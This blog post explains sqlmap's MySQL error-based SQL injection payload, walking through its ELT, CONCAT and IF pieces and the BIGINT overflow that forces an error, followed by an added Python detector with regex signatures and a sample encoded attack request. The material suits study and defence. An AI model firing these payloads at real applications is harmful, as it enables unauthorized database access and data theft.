SQLMAP Part 1

in #cn, 6 years ago


[image: https://cdn.steemitimages.com/DQmQ2LNT1quvZ4ywpQQicSxtHSf6SnVPqbMQv5BqaT8B4wD/image.png]

Here is a flowchart drawn by an expert:

[image: https://cdn.steemitimages.com/DQmYBaBMZkS2qDxQy9ttL6vAdG2kfaTnYWmwEGZdkfP2CSr/image.png]

Hmm... this article only covers the one injection technique I use myself: error-based injection.

Error-based injection is also called DOUBLE QUERY INJECTION.

Error-based tests - WHERE or HAVING clause

The payload is as follows:

```sql
AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
```

In it,

SELECT (ELT([RANDNUM]=[RANDNUM],1))

returns NULL, as shown here:

[image: https://cdn.steemitimages.com/DQmVned9DgTG5ocw3DSV9rDYsVuvFMy5atZh2ksm5GHJ3JH/image.png]

```sql
SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x')
```

The ELT() function is used as follows; this picture explains it well:

[image: https://cdn.steemitimages.com/DQmdACX4Pwek7jK9vBeF4j93ZdER4oTubE4zM2CUDnckrfD/image.png]

The CONCAT() function works like this:

```sql
mysql> SELECT CONCAT('My', 'S', 'QL');
    -> 'MySQL'
```

The IF() function works as follows:

IF(expr1, expr2, expr3): if expr1 is TRUE, IF() returns expr2; otherwise it returns expr3. The value IF() returns is numeric or a string, depending on the context in which it is used.

As for why this raises an error, you only need to run the following command in MySQL to understand:

select 3 * 8446744073709551610;

```
mysql> select 3 * 8446744073709551610;
ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'
mysql>
```
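As an added example (not part of the original post and not sqlmap's own code), here is a small Python detection helper built from the payload template above: it confirms the signed-BIGINT overflow arithmetic behind ERROR 1690, flags the probe's markers (ELT oracle, 2*(IF( wrapper, overflow constant, CONCAT delimiter wrapper) in URL-encoded request lines, and picks the offending expression out of the database error text. The regex signatures and the sample log lines are constructed assumptions, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# MySQL signed BIGINT range; the probe's constant fits, 2x or 3x of it does not.
BIGINT_MAX = 2**63 - 1
OVERFLOW_CONSTANT = 8446744073709551610

def bigint_product_overflows(multiplier, constant=OVERFLOW_CONSTANT):
    """True when multiplier*constant leaves the signed BIGINT range (ERROR 1690)."""
    return not (-BIGINT_MAX - 1 <= multiplier * constant <= BIGINT_MAX)

# Request-side markers of the WHERE/HAVING error-based probe (assumed signatures).
REQUEST_PATTERNS = [
    (re.compile(r"\bELT\s*\(\s*\d+\s*=\s*\d+\s*,\s*1\s*\)", re.I), "ELT(n=n,1) oracle"),
    (re.compile(r"\b2\s*\*\s*\(\s*IF\s*\(", re.I), "2*(IF( overflow wrapper"),
    (re.compile(str(OVERFLOW_CONSTANT)), "BIGINT overflow constant"),
    (re.compile(r"CONCAT\s*\(\s*'[^']*',\s*\(\s*SELECT\b", re.I), "CONCAT delimiter wrapper"),
]
# DB/application-side marker: the overflow error text that carries the expression.
ERROR_PATTERN = re.compile(r"ERROR 1690 \(22003\): BIGINT value is out of range in '(.*)'")

def scan_request(line):
    """URL-decode a request line and return the names of the markers it contains."""
    decoded = unquote_plus(unquote_plus(line))  # tolerate double encoding
    return [name for pat, name in REQUEST_PATTERNS if pat.search(decoded)]

def scan_error(line):
    """Return the offending expression if the line is a MySQL BIGINT overflow error."""
    m = ERROR_PATTERN.search(line)
    return m.group(1) if m else None

def scan_logs(lines):
    """Classify lines; a request needs at least two markers to count, to limit noise."""
    findings = []
    for line in lines:
        markers, expr = scan_request(line), scan_error(line)
        if len(markers) >= 2:
            findings.append(("request", line, markers))
        elif expr:
            findings.append(("error", line, [expr]))
    return findings

# Constructed sample lines: one encoded probe, the DB error from the page, one benign.
SAMPLE_LOGS = [
    "GET /item.php?id=1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT("
    "%27%5BDELIMITER_START%5D%27,(SELECT%20(ELT(1234%3D1234,1))),%27%5BDELIMITER_STOP%5D%27,"
    "%27x%27))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1",
    "[error] ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'",
    "GET /item.php?id=1 HTTP/1.1",
]
```

Running `scan_logs(SAMPLE_LOGS)` yields one "request" finding with all four markers and one "error" finding carrying `(3 * 8446744073709551610)`; the benign line is ignored.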

We're all script kiddies.

Hi ~ I'm a robot of lynnhua. I just upvoted your post!

Thanks so much~!! Please come visit me here: https://steemit.com/@lynnhua

thanks